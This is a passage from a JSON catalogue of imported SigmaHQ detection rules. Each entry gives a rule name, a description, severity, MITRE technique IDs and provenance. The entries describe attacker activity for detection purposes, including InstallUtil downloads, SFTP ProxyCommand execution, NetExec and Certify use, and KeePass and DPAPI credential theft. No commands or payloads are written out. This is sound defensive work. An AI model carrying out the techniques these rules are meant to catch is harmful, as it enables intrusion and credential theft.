"version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1203" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", 
"tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/office-application-initiated-network-connection-to-non-local-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "75e33ce3-ae32-4dcc-9aa8-a2a3029d6f84", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_office_outbound_non_local_ip.yml" } }, { "id": "sigmahq-sigma-75e508f7-932d-4ebc-af77-269237a84ce1", "type": "detection", "name": "DLL Loaded From Suspicious Location Via Cmspt.EXE", "description": "Detects cmstp loading \"dll\" or \"ocx\" files from suspicious locations", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dll-loaded-from-suspicious-location-via-cmspt-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "75e508f7-932d-4ebc-af77-269237a84ce1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_cmstp_load_dll_from_susp_location.yml" } }, { "id": "sigmahq-sigma-75edd216-1939-4c73-8d61-7f3a0d85b5cc", "type": "detection", "name": "File Download Via InstallUtil.EXE", "description": "Detects use of .NET InstallUtil.exe in order to download arbitrary files. 
The files will be written to \"%LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE\\\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-download-via-installutil-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "75edd216-1939-4c73-8d61-7f3a0d85b5cc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_installutil_download.yml" } }, { "id": "sigmahq-sigma-75edd3fd-7146-48e5-9848-3013d7f0282c", "type": "detection", "name": "DHCP Server Error Failed Loading the CallOut DLL", "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dhcp-server-error-failed-loading-the-callout-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "75edd3fd-7146-48e5-9848-3013d7f0282c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/builtin/system/microsoft_windows_dhcp_server/win_system_susp_dhcp_config_failed.yml" } }, { "id": "sigmahq-sigma-75f7a0e2-7154-4c4d-9eae-5cdb4e0a5c13", "type": "detection", "name": "Write Protect For Storage Disabled", "description": "Detects applications trying to modify the registry in order to disable any write-protect property for storage devices.\nThis could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/write-protect-for-storage-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "75f7a0e2-7154-4c4d-9eae-5cdb4e0a5c13", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_write_protect_for_storage_disabled.yml" } }, { "id": "sigmahq-sigma-760e75d8-c3b5-409b-a9bf-6130b4c4603f", "type": "detection", "name": "Self Extraction Directive File Created In Potentially Suspicious Location", "description": "Detects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location.\nThese files are used by the \"iexpress.exe\" utility in order to create self extracting packages.\nAttackers were seen abusing this utility and creating PE files with embedded \".sed\" entries.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": 
false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/self-extraction-directive-file-created-in-potentially-suspicious-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "760e75d8-c3b5-409b-a9bf-6130b4c4603f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_sed_file_creation.yml" } }, { "id": "sigmahq-sigma-7610a4ea-c06d-495f-a2ac-0a696abcfd3b", "type": "detection", "name": "Outbound Network Connection To Public IP Via Winlogon", "description": "Detects a \"winlogon.exe\" process that initiate network communications with public IP addresses", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/outbound-network-connection-to-public-ip-via-winlogon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7610a4ea-c06d-495f-a2ac-0a696abcfd3b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_winlogon_net_connections.yml" } }, { "id": "sigmahq-sigma-762bb580-79b4-40f4-8b9e-9349ce1710f4", "type": "detection", "name": "Indirect Command Execution via SFTP ProxyCommand", "description": "Detects the use of SFTP.exe to execute commands indirectly via ProxyCommand parameter.\nThreat 
actors were seen leveraging this legitimate Windows binary to bypass security controls and execute arbitrary commands while evading detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/indirect-command-execution-via-sftp-proxycommand.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "762bb580-79b4-40f4-8b9e-9349ce1710f4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sftp_proxy_command_execution.yml" } }, { "id": "sigmahq-sigma-762f2482-ff21-4970-8939-0aa317a886bb", "type": "detection", "name": "HackTool - Certify Execution", "description": "Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1649" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-certify-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "762f2482-ff21-4970-8939-0aa317a886bb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_hktl_certify.yml" } }, { "id": "sigmahq-sigma-7638e5fe-600c-4289-a968-f49dd537ec7d", "type": "detection", "name": "HackTool - NetExec Execution", "description": "Detects execution of the hacktool NetExec.\nNetExec (formerly CrackMapExec) is a widely used post-exploitation tool designed for Active Directory penetration testing and network enumeration\nIn enterprise environments, the use of NetExec is considered suspicious or potentially malicious because it enables attackers to enumerate hosts, exploit network services, and move laterally across systems.\nThreat actors and red teams commonly use NetExec to identify vulnerable systems, harvest credentials, and execute commands remotely.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1018", "T1021" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-netexec-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7638e5fe-600c-4289-a968-f49dd537ec7d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_netexec.yml" } }, { "id": "sigmahq-sigma-76737c19-66ee-4c07-b65a-a03301d1573d", "type": "detection", "name": "GCP Break-glass Container Workload Deployed", "description": "Detects the deployment of workloads that are deployed by using the break-glass flag to override Binary Authorization controls.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548" ], "log_source": 
null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/gcp-break-glass-container-workload-deployed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "76737c19-66ee-4c07-b65a-a03301d1573d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/audit/gcp_breakglass_container_workload_deployed.yml" } }, { "id": "sigmahq-sigma-7679d464-4f74-45e2-9e01-ac66c5eb041a", "type": "detection", "name": "HackTool - SecurityXploded Execution", "description": "Detects the execution of SecurityXploded Tools", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1555" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/hacktool-securityxploded-execution.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7679d464-4f74-45e2-9e01-ac66c5eb041a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_secutyxploded.yml" } }, { "id": "sigmahq-sigma-7692f583-bd30-4008-8615-75dab3f08a99", "type": "detection", "name": "Enable BPF Kprobes Tracing", "description": "Detects common command used to enable bpf kprobes tracing", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, 
"path": "detections/sigma-imports/_quarantine/enable-bpf-kprobes-tracing.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7692f583-bd30-4008-8615-75dab3f08a99", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_bpf_kprob_tracing_enabled.yml" } }, { "id": "sigmahq-sigma-76f55eaa-d27f-4213-9d45-7b0e4b60bbae", "type": "detection", "name": "Service Reconnaissance Via Wmic.EXE", "description": "An adversary might use WMI to check if a certain remote service is running on a remote device.\nWhen the test completes, a service information will be displayed on the screen if it exists.\nA common feedback message is that \"No instance(s) Available\" if the service queried is not running.\nA common error message is \"Node - (provided IP or default) ERROR Description =The RPC server is unavailable\" if the provided remote host is unreachable", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/service-reconnaissance-via-wmic-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "76f55eaa-d27f-4213-9d45-7b0e4b60bbae", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_recon_service.yml" } }, { "id": 
"sigmahq-sigma-7707a579-e0d8-4886-a853-ce47e4575aaa", "type": "detection", "name": "Wmiprvse Wbemcomn DLL Hijack", "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1047", "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wmiprvse-wbemcomn-dll-hijack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7707a579-e0d8-4886-a853-ce47e4575aaa", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml" } }, { "id": "sigmahq-sigma-771d1eb5-9587-4568-95fb-9ec44153a012", "type": "detection", "name": "PUA - NSudo Execution", "description": "Detects the use of NSudo tool for command execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-nsudo-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "771d1eb5-9587-4568-95fb-9ec44153a012", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": 
"2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_nsudo.yml" } }, { "id": "sigmahq-sigma-7745c2ea-24a5-4290-b680-04359cb84b35", "type": "detection", "name": "Path Traversal Exploitation Attempts", "description": "Detects path traversal exploitation attempts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/path-traversal-exploitation-attempts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7745c2ea-24a5-4290-b680-04359cb84b35", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/webserver_generic/web_path_traversal_exploitation_attempt.yml" } }, { "id": "sigmahq-sigma-77564cc2-7382-438b-a7f6-395c2ae53b9a", "type": "detection", "name": "Remote Thread Created In KeePass.EXE", "description": "Detects remote thread creation in \"KeePass.exe\" which could indicates potential password dumping activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1555.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-thread-created-in-keepass-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "77564cc2-7382-438b-a7f6-395c2ae53b9a", "source_commit": "df5c6a6", "license": "DRL-1.1", 
"license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/create_remote_thread/create_remote_thread_win_keepass.yml" } }, { "id": "sigmahq-sigma-7773b877-5abb-4a3e-b9c9-fd0369b59b00", "type": "detection", "name": "WMIC Remote Command Execution", "description": "Detects the execution of WMIC to query information on a remote system", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wmic-remote-command-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7773b877-5abb-4a3e-b9c9-fd0369b59b00", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_remote_execution.yml" } }, { "id": "sigmahq-sigma-778ba9a8-45e4-4b80-8e3e-34a419f0b85e", "type": "detection", "name": "TeamViewer Domain Query By Non-TeamViewer Application", "description": "Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn't named TeamViewer (sometimes used by threat actors for obfuscation)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/teamviewer-domain-query-by-non-teamviewer-application.yaml", "quarantine_reason": "imported rule; upstream query language not 
directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "778ba9a8-45e4-4b80-8e3e-34a419f0b85e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/dns_query/dns_query_win_teamviewer_domain_query_by_uncommon_app.yml" } }, { "id": "sigmahq-sigma-77946e79-97f1-45a2-84b4-f37b5c0d8682", "type": "detection", "name": "Suspicious Registry Modification From ADS Via Regini.EXE", "description": "Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-registry-modification-from-ads-via-regini-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "77946e79-97f1-45a2-84b4-f37b5c0d8682", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_regini_ads.yml" } }, { "id": "sigmahq-sigma-7794fa3c-edea-4cff-bec7-267dd4770fd7", "type": "detection", "name": "Clipboard Data Collection Via OSAScript", "description": "Detects possible collection of data from the clipboard via execution of the osascript binary", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1115", "T1059.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": 
"imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/clipboard-data-collection-via-osascript.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7794fa3c-edea-4cff-bec7-267dd4770fd7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_clipboard_data_via_osascript.yml" } }, { "id": "sigmahq-sigma-779c8c12-0eb1-11eb-adc1-0242ac120002", "type": "detection", "name": "Invoke-Obfuscation STDIN+ Launcher - Powershell", "description": "Detects Obfuscated use of stdin to execute PowerShell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-stdin-launcher-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "779c8c12-0eb1-11eb-adc1-0242ac120002", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_stdin.yml" } }, { "id": "sigmahq-sigma-77caf516-34e5-4df9-b4db-20744fea0a60", "type": "detection", "name": "AWS Successful Console Login Without MFA", "description": "Detects successful AWS console logins that were performed without Multi-Factor Authentication (MFA).\nThis alert can be used to identify potential unauthorized access attempts, as logging in without MFA can 
indicate compromised credentials or misconfigured security settings.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-successful-console-login-without-mfa.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "77caf516-34e5-4df9-b4db-20744fea0a60", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_console_login_success_without_mfa.yml" } }, { "id": "sigmahq-sigma-77df53a5-1d78-4f32-bc5a-0e7465bd8f41", "type": "detection", "name": "Portable Gpg.EXE Execution", "description": "Detects the execution of \"gpg.exe\" from uncommon location. 
Often used by ransomware and loaders to decrypt/encrypt data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1486" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/portable-gpg-exe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "77df53a5-1d78-4f32-bc5a-0e7465bd8f41", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_gpg4win_portable_execution.yml" } }, { "id": "sigmahq-sigma-780601d1-6376-4f2a-884e-b8d45599f78c", "type": "detection", "name": "Google Workspace MFA Disabled", "description": "Detects when multi-factor authentication (MFA) is disabled.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/google-workspace-mfa-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "780601d1-6376-4f2a-884e-b8d45599f78c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/gworkspace/admin/gcp_gworkspace_mfa_disabled.yml" } }, { "id": "sigmahq-sigma-782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", "type": "detection", "name": "RDP Port Forwarding Rule Added Via 
Netsh.EXE", "description": "Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1090" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rdp-port-forwarding-rule-added-via-netsh-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_netsh_port_forwarding_3389.yml" } }, { "id": "sigmahq-sigma-7864a175-3654-4824-9f0d-f0da18ab27c0", "type": "detection", "name": "Password Set to Never Expire via WMI", "description": "Detects the use of wmic.exe to modify user account settings and explicitly disable password expiration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047", "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/password-set-to-never-expire-via-wmi.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7864a175-3654-4824-9f0d-f0da18ab27c0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_wmi_password_never_expire.yml" } }, { "id": "sigmahq-sigma-786cdae8-fefb-4eb2-9227-04e34060db01", "type": "detection", "name": "Suspicious Wordpad Outbound Connections", "description": "Detects a network connection initiated by \"wordpad.exe\" over uncommon destination ports.\nThis might indicate potential process injection activity from a beacon or similar mechanisms.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-wordpad-outbound-connections.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "786cdae8-fefb-4eb2-9227-04e34060db01", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_wordpad_uncommon_ports.yml" } }, { "id": "sigmahq-sigma-7892ec59-c5bb-496d-8968-e5d210ca3ac4", "type": "detection", "name": "DPAPI Backup Keys And Certificate Export Activity IOC", "description": "Detects file names with specific patterns seen generated and used by tools such as Mimikatz and DSInternals related to exported or stolen DPAPI backup keys and certificates.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1555", "T1552.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dpapi-backup-keys-and-certificate-export-activity-ioc.yaml", "quarantine_reason": "imported 
